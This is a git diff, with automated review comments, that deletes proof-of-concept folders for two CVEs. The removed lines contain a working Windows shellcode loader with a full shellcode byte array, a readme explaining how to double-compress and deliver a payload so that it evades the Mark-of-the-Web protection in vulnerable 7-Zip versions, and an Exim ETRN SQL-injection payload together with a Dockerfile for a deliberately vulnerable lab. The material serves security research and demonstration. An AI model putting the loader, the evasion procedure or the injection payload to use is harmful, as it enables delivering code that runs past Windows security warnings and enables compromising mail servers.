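Review bot: in the 7-Zip-CVE-2025-0411-PoC.py hunk, `get_7zip_version()` returns `None` for two different reasons but reports only one of them: the `FileNotFoundError` branch prints a message, whereas a `7z` banner that does not match `r"7-Zip (\d+)\.(\d+)"` falls through to the trailing `return None` silently, and `main()` then exits with no output at all, so an unrecognised banner is indistinguishable from "not installed". If the version probe is reused anywhere (the readme in this changeset suggests it for version detection), the unmatched case should print the banner it could not parse. The output names here (`compiled.exe`, `first_compressed.7z`, `double_compressed.7z`) also disagree with the names the accompanying readme documents (`execute.exe`, `executable.7z`, `final.7z`); moot now that both files are removed, but worth aligning if they are re-added elsewhere. The return value of the final `compress_file(...)` call is not checked, unlike the earlier one.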
@@ -1,67 +0,0 @@ -#include -#include - -unsigned char shellcode[] = { - 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, - 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, - 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, - 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, - 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, - 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, - 0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, - 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x8b, 0x80, 0x88, - 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, - 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, - 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, - 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, - 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, - 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, - 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, - 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, - 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, - 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, - 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, - 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x57, 0xff, - 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, - 0x41, 0xba, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, - 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff, - 0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, - 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, - 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c, - 0x63, 0x2e, 0x65, 0x78, 0x65, 0x00}; - -int main() -{ - void *exec_mem; - BOOL success; - HANDLE threadHandle; - DWORD oldProtect = 0; - - exec_mem = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); - if (!exec_mem) - { - 
MessageBoxA(NULL, "VirtualAlloc failed", "ERROR", MB_OK); - return -1; - } - - memcpy(exec_mem, shellcode, sizeof(shellcode)); - - success = VirtualProtect(exec_mem, sizeof(shellcode), PAGE_EXECUTE_READ, &oldProtect); - if (!success) - { - MessageBoxA(NULL, "VirtualProtect failed", "ERROR", MB_OK); - return -1; - } - - threadHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL, 0, NULL); - if (!threadHandle) - { - MessageBoxA(NULL, "CreateThread failed", "ERROR", MB_OK); - return -1; - } - - WaitForSingleObject(threadHandle, INFINITE); - - return 0; -} \ No newline at end of file diff --git a/CVE-2025-0411/pictures/SmartScreen.png b/CVE-2025-0411/pictures/SmartScreen.png deleted file mode 100644 index 5455f5b..0000000 Binary files a/CVE-2025-0411/pictures/SmartScreen.png and /dev/null differ diff --git a/CVE-2025-0411/pictures/calc.png b/CVE-2025-0411/pictures/calc.png deleted file mode 100644 index f7fcae5..0000000 Binary files a/CVE-2025-0411/pictures/calc.png and /dev/null differ diff --git a/CVE-2025-0411/pictures/dir_command.png b/CVE-2025-0411/pictures/dir_command.png deleted file mode 100644 index f35f58c..0000000 Binary files a/CVE-2025-0411/pictures/dir_command.png and /dev/null differ diff --git a/CVE-2025-0411/pictures/double_compression.png b/CVE-2025-0411/pictures/double_compression.png deleted file mode 100644 index be25fb8..0000000 Binary files a/CVE-2025-0411/pictures/double_compression.png and /dev/null differ diff --git a/CVE-2025-0411/pictures/mediafire.png b/CVE-2025-0411/pictures/mediafire.png deleted file mode 100644 index 64ba650..0000000 Binary files a/CVE-2025-0411/pictures/mediafire.png and /dev/null differ diff --git a/CVE-2025-0411/pictures/powershell_stream.png b/CVE-2025-0411/pictures/powershell_stream.png deleted file mode 100644 index 4afb737..0000000 Binary files a/CVE-2025-0411/pictures/powershell_stream.png and /dev/null differ 
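Review bot: in the executable.cpp hunk the two `#include` lines have lost their header names in this rendering (`-#include -#include`), so the record does not show which headers the loader depended on; if the file is ever restored, the includes need to be re-established from a real checkout rather than copied from here. On substance, the loader is the textbook in-memory execution sequence (`VirtualAlloc` with `PAGE_READWRITE`, `memcpy` of the byte array, `VirtualProtect` to `PAGE_EXECUTE_READ`, `CreateThread` on the buffer, `WaitForSingleObject`); that RW-then-RX-then-thread-start pattern on a private allocation is exactly what endpoint memory heuristics flag, which is consistent with the readme's own note that the demo only runs with Defender turned off. The `\ No newline at end of file` marker is cosmetic.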
diff --git a/CVE-2025-0411/readme.md b/CVE-2025-0411/readme.md deleted file mode 100644 index d18e8a8..0000000 --- a/CVE-2025-0411/readme.md +++ /dev/null 
@@ -1,71 +0,0 @@ - -# 7-Zip Allows MoTW Bypass in Nested Zip Files - -## PoC -##### **Note**, this PoC is desgined to demonstrate the MoTW bypass and hence would be needed to follow along by turning _**off**_ the **Windows Defender**. The intention is to demonstrate the bypass, if needed to use in the real world red teaming scenarios, the Python Script can be used for version detection and double compression purposes. -### Introduction -[CVE-2025-0411](https://nvd.nist.gov/vuln/detail/CVE-2025-0411) is a recently discovered vulnerability in the popular 7-Zip file archiver software that allows attackers to bypass Windows’ Mark-of-the-Web (MoTW) protection mechanism. This bypass enables malicious files extracted from specially crafted archives to execute without triggering security warnings, exposing users to potential threats such as malware and phishing attacks. The PoC to be demonstrated builds up on it, it covers how an attacker can craft a nested archive to evade MoTW protections. - -#### Understanding the Files - -##### 7-Zip-CVE-2025-0411-PoC.py (Python Script) -This script automates the process of checking the version of the installed 7Zip version, compilation and compression of a C++ executable: - -* **Version Checking** checks if 7Zip is installed on the target system or not and then also version checks it to see if the installed version is vulnerable or not. - -* **Compiles** a C++ source file (executable.cpp) into a statically linked Windows executable (execute.exe) using g++. - -* **Compresses** the generated executable into a .7z archive using 7-Zip. - -* **Further compresses** the first archive (executable.7z) into a final .7z archive (final.7z). - -The script ensures the process runs sequentially, checking for file and software existence before proceeding. - -##### Executable.cpp (C++ Shellcode Loader) - -This C++ program executes shellcode in memory: - -* **Allocates** memory (VirtualAlloc) with read-write permissions. 
- -* **Copies shellcode** for running calc.exe into the allocated memory. - -* **Changes memory protection** to executable (VirtualProtect). - -* **Creates a new thread** (CreateThread) to execute the shellcode. - -* **Waits** for execution to complete. - -#### Preparation of the Nested .7z and obtaining the MoTW -After cloning the repository, we need to run the script via any terminal in order to detect the version of the software used and to compress our shellcode file. - -![Command Execution](pictures/double_compression.png "Running the Python Script") - -After double compressing the file, we have successfully gotten a nested file. But, if we try to access the file from the 7Zip GUI(accessing it through 7Zip in general), it would not result into our desired response because our file is still missing it's key component, the MoTW. - -To solve this issue, we can upload the file _final.7z_ to any platform like MediaFire, Google Drive, Mega etc. This is used in order to simulate the delivery of our .7z file, - -![MediaFire Interface](pictures/mediafire.png "Final file uploaded on MediaFire") - -After we download our file, it now bears the MoTW. We can confirm it via running the following commands, - - > dir /R (Can be used in either CMD or PowerShell) - -![Command Execution](pictures/dir_command.png "Output of Dir /R") - - > Get-Item .\final.7z -Stream * (To be used in PowerShell) - -![Command Execution](pictures/powershell_stream.png "Output of the PowerShell command") - -In the aforementioned we observe the file having an Alternate Data Stream rather than the original ::$DATA which has the file data, the second stream containing the Zone.Identifier stream confirms the MoTW. - - -#### Execution - -In versions where the vulnerability is patched we see that when we access the compiled executable via the 7-Zip software we see a SmartScreen alert blocking the execution of our shellcode. 
This is because of the correct migration of the MoTW from each nested file, mitigating the issue. -[![SmartScreen blocking the shellcode execution](pictures/SmartScreen.png)](videos/SmartScreen-.mp4) - -Whereas, in an ideal situation where we have 7-Zip installed and our version is vulnerable(prior to 24.09) we can now access the file via opening it via 7-Zip and we can see how our shellcode can execute successfully. -[![Execution of the shellcode](pictures/calc.png)](videos/Calc.mp4) - - - diff --git a/CVE-2025-0411/videos/Calc.mp4 b/CVE-2025-0411/videos/Calc.mp4 deleted file mode 100644 index 33144b5..0000000 Binary files a/CVE-2025-0411/videos/Calc.mp4 and /dev/null differ diff --git a/CVE-2025-0411/videos/SmartScreen-.mp4 b/CVE-2025-0411/videos/SmartScreen-.mp4 deleted file mode 100644 index b600f8e..0000000 Binary files a/CVE-2025-0411/videos/SmartScreen-.mp4 and /dev/null differ diff --git a/CVE-2025-26794/Readme.md b/CVE-2025-26794/Readme.md deleted file mode 100644 index 5f0c3aa..0000000 --- a/CVE-2025-26794/Readme.md +++ /dev/null 
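Review bot: the CVE-2025-0411 readme hunk and the Python script it describes disagree on artefact names: the readme documents `execute.exe`, `executable.7z` and `final.7z`, while the script in the same changeset writes `compiled.exe`, `first_compressed.7z` and `double_compressed.7z`, so a reader following the `dir /R` and `Get-Item .\final.7z -Stream *` steps would not find the file. The title says "Nested Zip Files" although the archives demonstrated are `.7z`. Wording: "desgined" should be "designed", "it's key component" should be "its key component", and "correct migration of the MoTW" in the Execution section means propagation of the `Zone.Identifier` stream to the extracted inner file. The `Get-Item -Stream *` check shown is the right defender-side verification that a downloaded archive carries `Zone.Identifier`; running the same check on the extracted executable is how one confirms that a patched 7-Zip (24.09 or later, per the readme) propagates the stream, and it would make the Execution section verifiable without relying on the screenshots.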
@@ -1,68 +0,0 @@ -# Overview of CVE-2025-26794 - -CVE-2025-26794 is a critical SQL injection vulnerability affecting Exim Mail Server, specifically impacting version 4.98. The vulnerability is in the `hintsdb.h` file (now relocated to `hints_sqlite.h` in newer versions) and is related to Exim’s SQLite-based hints database used with ETRN serialization. Due to unsafe SQL query handling, remote attackers can craft malicious ETRN requests (ETRN request is a command that instructs a mail server to deliver all emails for a domain to another SMTP server.) to execute unauthorized SQL commands, potentially compromising the mail server’s database and overall integrity. - -## Root Cause of the Vulnerability - -### Unvalidated User Input in SQL Queries -- The system concatenated user input directly into SQL statements without proper sanitization, allowing attackers to manipulate the database. -- Specifically, ETRN requests were processed without adequate filtering, opening the door for SQL injection. - -### Unsafe String Handling & Memory Mismanagement -- Improper string termination checks allowed malformed keys to be processed. -- Dynamic memory allocations lacked boundary checks, increasing the risk of buffer overflows and segmentation faults. - -### Direct Execution of Unescaped SQL Queries -- Functions like `sqlite3_exec` and `sprintf` were used with user-supplied data without escaping or parameterization. -- The function `exim_s_dbp` was particularly implicated in this issue. - -## Exploitation Vector - -Attackers could manipulate ETRN commands to inject SQL code. Example payload: - -```sql -ETRN #',1); ## INSERT SQL HERE ## /* -``` - -This exploit allowed arbitrary SQL execution, which could lead to unauthorized data modification, credential theft, or full database compromise. 
- -## Security Fixes Implemented - -To mitigate CVE-2025-26794, Exim maintainers introduced the following security patches: - -### Introduction of Parameterized Queries -- Replaced vulnerable string concatenation with prepared statements (`sqlite3_prepare_v2`). -- Used `sqlite3_bind_text` to securely insert user input instead of direct interpolation. - -### Stricter String Handling -- Introduced a new function `is_cstring()` to validate key integrity before processing. -- Ensured all input keys are null-terminated to prevent buffer overflows. - -### Enhanced Memory Safety -- Explicitly checked all memory allocations before use. -- Removed unsafe `malloc` and `memcpy` operations that could cause segmentation faults. - -### Secure Query Execution -- Eliminated `sqlite3_exec` calls in favor of safer, bound execution methods. -- Introduced explicit NULL checking for SQL statements to prevent unexpected crashes. - -## Mitigation Measures - -### Immediate Upgrade -- Users should update to Exim version 4.98.1 or later, where this vulnerability has been addressed. - -### Configuration Review -- Ensure the setting `acl_smtp_etrn` is set to `'deny'` unless ETRN functionality is explicitly required. -- Verify `smtp_etrn_serialize` is correctly configured to prevent unauthorized access. - -## Impact of the Fixes - -- SQL Injection risks were eliminated, preventing unauthorized database manipulation. -- Memory safety was significantly improved, reducing the likelihood of buffer overflows and crashes. -- Debugging capabilities were enhanced, allowing safer troubleshooting without exposing sensitive database queries. - -## Conclusion - -By addressing CVE-2025-26794, Exim’s maintainers have significantly hardened the security of its mail server database interactions, preventing attackers from leveraging SQL injection to compromise systems. These fixes ensure safer query execution, reinforce input validation, and reduce the risk of future vulnerabilities. 
- -Organizations using Exim should immediately upgrade to a patched version and review their configurations to ensure continued security. diff --git a/CVE-2025-26794/exim.mp4 b/CVE-2025-26794/exim.mp4 deleted file mode 100644 index 73d62e2..0000000 Binary files a/CVE-2025-26794/exim.mp4 and /dev/null differ diff --git a/CVE-2025-26794/files/Dockerfile b/CVE-2025-26794/files/Dockerfile deleted file mode 100644 index 4737f8c..0000000 --- a/CVE-2025-26794/files/Dockerfile +++ /dev/null @@ -1,36 +0,0 @@ -FROM debian - -RUN apt-get update -RUN apt-get install -y gcc net-tools vim gdb python3 wget git make procps libpcre3-dev libdb-dev libxt-dev libxaw7-dev libpcre2-dev libssl-dev nano libsqlite3-dev sqlite3 telnet pkg-config -RUN cpan install File::FcntlLock - -RUN useradd -ms /bin/bash exim-demo - -RUN git clone https://github.com/Exim/exim.git - -## Checkout latest version -RUN cd exim && git checkout exim-4.98 && cd src && mkdir -p Local && cp src/EDITME Local/Makefile && cp exim_monitor/EDITME Local/eximon.conf - -WORKDIR /exim/src -RUN sed -i 's/^EXIM_USER=.*$/EXIM_USER=exim-demo/' Local/Makefile -RUN sed -i 's/^#\s*\(AUTH_PLAINTEXT=yes\)/\1/' Local/Makefile - -# Add debug flags -RUN sed -i 's/CFLAGS ?= -O\b/CFLAGS ?= -Og -g/' OS/Makefile-Linux - -RUN sed -i 's/^#\s*\(USE_OPENSSL=yes\)/\1/' Local/Makefile -RUN sed -i 's/^#\s*\(USE_OPENSSL_PC=openssl\)/\1/' Local/Makefile -## Add SQLITE Support -RUN sed -i 's/^#\s*\(USE_SQLITE = yes\)/\1/' Local/Makefile -RUN echo "DBMLIB = -lsqlite3" >> Local/Makefile - -RUN make makefile - -RUN make install - -COPY start-exim.sh . - -# runtime config -COPY configure /usr/exim/configure - - diff --git a/CVE-2025-26794/files/Makefile-Linux b/CVE-2025-26794/files/Makefile-Linux deleted file mode 100644 index dfb2fa8..0000000 --- a/CVE-2025-26794/files/Makefile-Linux +++ /dev/null 
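Review bot: in the CVE-2025-26794 Readme hunk, the "Configuration Review" mitigation mischaracterises `smtp_etrn_serialize`: that option controls whether Exim serialises concurrent ETRN runs for the same argument through its hints database (the very code path this readme places the bug in), not who may issue ETRN; access control for the command is the `acl_smtp_etrn` ACL, so the advice should point readers at denying ETRN there rather than at the serialize flag. Relatedly, the readme's recommendation to deny ETRN is contradicted by the lab `configure` shipped in this same changeset, which wires `acl_smtp_etrn = acl_smtp_etrn` to an ACL whose only statement is `accept`; that is appropriate for a deliberately vulnerable test image but deserves a sentence in the readme so nobody copies the config into production. The root-cause claims about `sprintf`, `malloc`/`memcpy` and segmentation faults, and the fix description (`sqlite3_prepare_v2`, `sqlite3_bind_text`, `is_cstring()`), carry no link to the upstream commit; referencing it would let readers verify them against `hintsdb.h`/`hints_sqlite.h`.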
@@ -1,39 +0,0 @@ -# Exim: OS-specific make file for Linux. This is for modern Linuxes, -# which use libc6. -# Copyright (c) The Exim Maintainers 2020 -# -# For Linux, we assume GNU Make; at time of writing, the only extension -# used is ?= which is actually portable to other maintained Make variants, -# just is not POSIX. - -HAVE_ICONV=yes - -BASENAME_COMMAND=look_for_it -CHOWN_COMMAND=look_for_it -CHGRP_COMMAND=look_for_it -CHMOD_COMMAND=look_for_it - -# The system cc may be gcc or clang; do not force gcc -CC=cc -# Preserve CFLAGS and CFLAGS_DYNAMIC from the caller/environment -CFLAGS ?= -O -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE -CFLAGS_DYNAMIC ?= -shared -rdynamic - -DBMLIB = -ldb -USE_DB = yes - -LIBS = -lcrypt -lm -LIBRESOLV = -lresolv - -X11=/usr/X11R6 -XINCLUDE=-I$(X11)/include -XLFLAGS=-L$(X11)/lib -X11_LD_LIB=$(X11)/lib - -EXIWHAT_PS_ARG=ax -EXIWHAT_EGREP_ARG='/exim( |$$)' -EXIWHAT_MULTIKILL_CMD=killall -EXIWHAT_MULTIKILL_ARG=exim -EXIWHAT_KILL_SIGNAL=-USR1 - -# End diff --git a/CVE-2025-26794/files/configure b/CVE-2025-26794/files/configure deleted file mode 100644 index 21dddf9..0000000 --- a/CVE-2025-26794/files/configure +++ /dev/null 
@@ -1,1032 +0,0 @@ - ###################################################################### -# Runtime configuration file for Exim # -###################################################################### - - -# This is a default configuration file which will operate correctly in -# uncomplicated installations. Please see the manual for a complete list -# of all the runtime configuration options that can be included in a -# configuration file. There are many more than are mentioned here. The -# manual is in the file doc/spec.txt in the Exim distribution as a plain -# ASCII file. Other formats (PostScript, Texinfo, HTML, PDF) are available -# from the Exim ftp sites. The manual is also online at the Exim website. - - -# This file is divided into several parts, all but the first of which are -# headed by a line starting with the word "begin". Only those parts that -# are required need to be present. Blank lines, and lines starting with # -# are ignored. - - -########### IMPORTANT ########## IMPORTANT ########### IMPORTANT ########### -# # -# Whenever you change Exim's configuration file, you *must* remember to # -# HUP the Exim daemon, because it will not pick up the new configuration # -# until you do. However, any other Exim processes that are started, for # -# example, a process started by an MUA in order to send a message, will # -# see the new configuration as soon as it is in place. # -# # -# You do not need to HUP the daemon for changes in auxiliary files that # -# are referenced from this file. They are read every time they are used. # -# # -# It is usually a good idea to test a new configuration for syntactic # -# correctness before installing it (for example, by running the command # -# "exim -C /config/file.new -bV"). 
# -# # -########### IMPORTANT ########## IMPORTANT ########### IMPORTANT ########### - - - -###################################################################### -# MACROS # -###################################################################### -# - -# If you want to use a smarthost instead of sending directly to recipient -# domains, uncomment this macro definition and set a real hostname. -# An appropriately privileged user can then redirect email on the command-line -# in emergencies, via -D. -# -# ROUTER_SMARTHOST=MAIL.HOSTNAME.FOR.CENTRAL.SERVER.EXAMPLE - -###################################################################### -# MAIN CONFIGURATION SETTINGS # -###################################################################### -# - -# Specify your host's canonical name here. This should normally be the fully -# qualified "official" name of your host. If this option is not set, the -# uname() function is called to obtain the name. In many cases this does -# the right thing and you need not set anything explicitly. - -# primary_hostname = - - -# The next three settings create two lists of domains and one list of hosts. -# These lists are referred to later in this configuration using the syntax -# +local_domains, +relay_to_domains, and +relay_from_hosts, respectively. They -# are all colon-separated lists: - -domainlist local_domains = @ -domainlist relay_to_domains = -hostlist relay_from_hosts = localhost -# (We rely upon hostname resolution working for localhost, because the default -# uncommented configuration needs to work in IPv4-only environments.) - -# Most straightforward access control requirements can be obtained by -# appropriate settings of the above options. In more complicated situations, -# you may need to modify the Access Control Lists (ACLs) which appear later in -# this file. 
- -# The first setting specifies your local domains, for example: -# -# domainlist local_domains = my.first.domain : my.second.domain -# -# You can use "@" to mean "the name of the local host", as in the default -# setting above. This is the name that is specified by primary_hostname, -# as specified above (or defaulted). If you do not want to do any local -# deliveries, remove the "@" from the setting above. If you want to accept mail -# addressed to your host's literal IP address, for example, mail addressed to -# "user@[192.168.23.44]", you can add "@[]" as an item in the local domains -# list. You also need to uncomment "allow_domain_literals" below. This is not -# recommended for today's Internet. - -# The second setting specifies domains for which your host is an incoming relay. -# If you are not doing any relaying, you should leave the list empty. However, -# if your host is an MX backup or gateway of some kind for some domains, you -# must set relay_to_domains to match those domains. For example: -# -# domainlist relay_to_domains = *.myco.com : my.friend.org -# -# This will allow any host to relay through your host to those domains. -# See the section of the manual entitled "Control of relaying" for more -# information. - -# The third setting specifies hosts that can use your host as an outgoing relay -# to any other host on the Internet. Such a setting commonly refers to a -# complete local network as well as the localhost. For example: -# -# hostlist relay_from_hosts = <; 127.0.0.1 ; ::1 ; 192.168.0.0/16 -# -# The "/16" is a bit mask (CIDR notation), not a number of hosts. Note that you -# have to include 127.0.0.1 if you want to allow processes on your host to send -# SMTP mail by using the loopback address. A number of MUAs use this method of -# sending mail. Often, connections are made to "localhost", which might be ::1 -# on IPv6-enabled hosts. Do not forget CIDR for your IPv6 networks. 
- -# All three of these lists may contain many different kinds of item, including -# wildcarded names, regular expressions, and file lookups. See the reference -# manual for details. The lists above are used in the access control lists for -# checking incoming messages. The names of these ACLs are defined here: - -acl_smtp_rcpt = acl_check_rcpt -.ifdef _HAVE_PRDR -acl_smtp_data_prdr = acl_check_prdr -.endif -acl_smtp_data = acl_check_data -acl_smtp_etrn = acl_smtp_etrn -# You should not change those settings until you understand how ACLs work. - - -# If you are running a version of Exim that was compiled with the content- -# scanning extension, you can cause incoming messages to be automatically -# scanned for viruses. You have to modify the configuration in two places to -# set this up. The first of them is here, where you define the interface to -# your scanner. This example is typical for ClamAV; see the manual for details -# of what to set for other virus scanners. The second modification is in the -# acl_check_data access control list (see below). - -# av_scanner = clamd:/tmp/clamd - - -# For spam scanning, there is a similar option that defines the interface to -# SpamAssassin. You do not need to set this if you are using the default, which -# is shown in this commented example. As for virus scanning, you must also -# modify the acl_check_data access control list to enable spam scanning. - -# spamd_address = 127.0.0.1 783 - - -# If Exim is compiled with support for TLS, you may want to change the -# following option so that Exim disallows certain clients from makeing encrypted -# connections. The default is to allow all. -# In the authenticators section below, there are template configurations for -# plaintext username/password authentication. This kind of authentication is -# only safe when used within a TLS connection, so the authenticators will only -# work if TLS is allowed here. - -# This is equivalent to the default. 
- -# tls_advertise_hosts = * - -# Specify the location of the Exim server's TLS certificate and private key. -# The private key must not be encrypted (password protected). You can put -# the certificate and private key in the same file, in which case you only -# need the first setting, or in separate files, in which case you need both -# options. - -# tls_certificate = /etc/ssl/exim.crt -# tls_privatekey = /etc/ssl/exim.pem - -# For OpenSSL, prefer EC- over RSA-authenticated ciphers -.ifdef _HAVE_OPENSSL -tls_require_ciphers = ECDSA:RSA:!COMPLEMENTOFDEFAULT -.endif - -# Don't offer resumption to (most) MUAs, who we don't want to reuse -# tickets. Once the TLS extension for vended ticket numbers comes -# though, re-examine since resumption on a single-use ticket is still a benefit. -.ifdef _HAVE_TLS_RESUME -tls_resumption_hosts = ${if inlist {$received_port}{587:465} {:}{*}} -.endif - -# In order to support roaming users who wish to send email from anywhere, -# you may want to make Exim listen on other ports as well as port 25, in -# case these users need to send email from a network that blocks port 25. -# The standard ports for this purpose are: -# port 587, the "message submission" port - see RFC 4409 for details, -# and 465 the TLS-encrypted "submission" port, service name is "submissions", -# see RFC 8314. - -# Microsoft MUAs cannot be configured to -# talk the message submission protocol correctly, so if you need to support -# them you should also allow TLS-on-connect on the traditional (and now -# standard) port 465. - -# daemon_smtp_ports = 25 : 465 : 587 -# tls_on_connect_ports = 465 - - -# Specify the domain you want to be added to all unqualified addresses -# here. An unqualified address is one that does not contain an "@" character -# followed by a domain. For example, "caesar@rome.example" is a fully qualified -# address, but the string "caesar" (i.e. just a login name) is an unqualified -# email address. 
Unqualified addresses are accepted only from local callers by -# default. See the recipient_unqualified_hosts option if you want to permit -# unqualified addresses from remote sources. If this option is not set, the -# primary_hostname value is used for qualification. - -# qualify_domain = - - -# If you want unqualified recipient addresses to be qualified with a different -# domain to unqualified sender addresses, specify the recipient domain here. -# If this option is not set, the qualify_domain value is used. - -# qualify_recipient = - - -# The following line must be uncommented if you want Exim to recognize -# addresses of the form "user@[10.11.12.13]" that is, with a "domain literal" -# (an IP address) instead of a named domain. The RFCs still require this form, -# but it makes little sense to permit mail to be sent to specific hosts by -# their IP address in the modern Internet. This ancient format has been used -# by those seeking to abuse hosts by using them for unwanted relaying. If you -# really do want to support domain literals, uncomment the following line, and -# see also the "domain_literal" router below. - -# allow_domain_literals - - -# No deliveries will ever be run under the uids of users specified by -# never_users (a colon-separated list). An attempt to do so causes a panic -# error to be logged, and the delivery to be deferred. This is a paranoic -# safety catch. There is an even stronger safety catch in the form of the -# FIXED_NEVER_USERS setting in the configuration for building Exim. The list of -# users that it specifies is built into the binary, and cannot be changed. The -# option below just adds additional users to the list. The default for -# FIXED_NEVER_USERS is "root", but just to be absolutely sure, the default here -# is also "root". - -# Note that the default setting means you cannot deliver mail addressed to root -# as if it were a normal user. 
This isn't usually a problem, as most sites have -# an alias for root that redirects such mail to a human administrator. - -never_users = root - - -# The setting below causes Exim to do a reverse DNS lookup on all incoming -# IP calls, in order to get the true host name. If you feel this is too -# expensive, you can specify the networks for which a lookup is done, or -# remove the setting entirely. - -host_lookup = * - - -# The setting below causes Exim to try to initialize the system resolver -# library with DNSSEC support. It has no effect if your library lacks -# DNSSEC support. - -dns_dnssec_ok = 1 - - -# The settings below cause Exim to make RFC 1413 (ident) callbacks -# for all incoming SMTP calls. You can limit the hosts to which these -# calls are made, and/or change the timeout that is used. If you set -# the timeout to zero, all RFC 1413 calls are disabled. RFC 1413 calls -# are cheap and can provide useful information for tracing problem -# messages, but some hosts and firewalls have problems with them. -# This can result in a timeout instead of an immediate refused -# connection, leading to delays on starting up SMTP sessions. -# (The default was reduced from 30s to 5s for release 4.61. and to -# disabled for release 4.86) -# -#rfc1413_hosts = * -#rfc1413_query_timeout = 5s - - -# Enable an efficiency feature. We advertise the feature; clients -# may request to use it. For multi-recipient mails we then can -# reject or accept per-user after the message is received. -# This supports recipient-dependent content filtering; without it -# you have to temp-reject any recipients after the first that have -# incompatible filtering, and do the filtering in the data ACL. -# Even with this enabled, you must support the old style for peers -# not flagging support for PRDR (visible via $prdr_requested). 
-# -.ifdef _HAVE_PRDR -prdr_enable = true -.endif - - -# By default, Exim expects all envelope addresses to be fully qualified, that -# is, they must contain both a local part and a domain. If you want to accept -# unqualified addresses (just a local part) from certain hosts, you can specify -# these hosts by setting one or both of -# -# sender_unqualified_hosts = -# recipient_unqualified_hosts = -# -# to control sender and recipient addresses, respectively. When this is done, -# unqualified addresses are qualified using the settings of qualify_domain -# and/or qualify_recipient (see above). - - -# Unless you run a high-volume site you probably want more logging -# detail than the default. Adjust to suit. - -log_selector = +smtp_protocol_error +smtp_syntax_error \ - +tls_certificate_verified - - -# If you want Exim to support the "percent hack" for certain domains, -# uncomment the following line and provide a list of domains. The "percent -# hack" is the feature by which mail addressed to x%y@z (where z is one of -# the domains listed) is locally rerouted to x@y and sent on. If z is not one -# of the "percent hack" domains, x%y is treated as an ordinary local part. This -# hack is rarely needed nowadays; you should not enable it unless you are sure -# that you really need it. -# -# percent_hack_domains = -# -# As well as setting this option you will also need to remove the test -# for local parts containing % in the ACL definition below. - - -# When Exim can neither deliver a message nor return it to sender, it "freezes" -# the delivery error message (aka "bounce message"). There are also other -# circumstances in which messages get frozen. They will stay on the queue for -# ever unless one of the following options is set. - -# This option unfreezes frozen bounce messages after two days, tries -# once more to deliver them, and ignores any delivery failures. 
- -ignore_bounce_errors_after = 2d - -# This option cancels (removes) frozen messages that are older than a week. - -timeout_frozen_after = 7d - - -# By default, messages that are waiting on Exim's queue are all held in a -# single directory called "input" which is itself within Exim's spool -# directory. (The default spool directory is specified when Exim is built, and -# is often /var/spool/exim/.) Exim works best when its queue is kept short, but -# there are circumstances where this is not always possible. If you uncomment -# the setting below, messages on the queue are held in 62 subdirectories of -# "input" instead of all in the same directory. The subdirectories are called -# 0, 1, ... A, B, ... a, b, ... z. This has two benefits: (1) If your file -# system degrades with many files in one directory, this is less likely to -# happen; (2) Exim can process the queue one subdirectory at a time instead of -# all at once, which can give better performance with large queues. - -# split_spool_directory = true - - -# If you're in a part of the world where ASCII is not sufficient for most -# text, then you're probably familiar with RFC2047 message header extensions. -# By default, Exim adheres to the specification, including a limit of 76 -# characters to a line, with encoded words fitting within a line. -# If you wish to use decoded headers in message filters in such a way -# that successful decoding of malformed messages matters, you may wish to -# configure Exim to be more lenient. -# -# check_rfc2047_length = false -# -# In particular, the Exim maintainers have had multiple reports of problems -# from Russian administrators of issues until they disable this check, -# because of some popular, yet buggy, mail composition software. - - -# If you wish to be strictly RFC compliant, or if you know you'll be -# exchanging email with systems that are not 8-bit clean, then you may -# wish to disable advertising 8BITMIME. Uncomment this option to do so. 
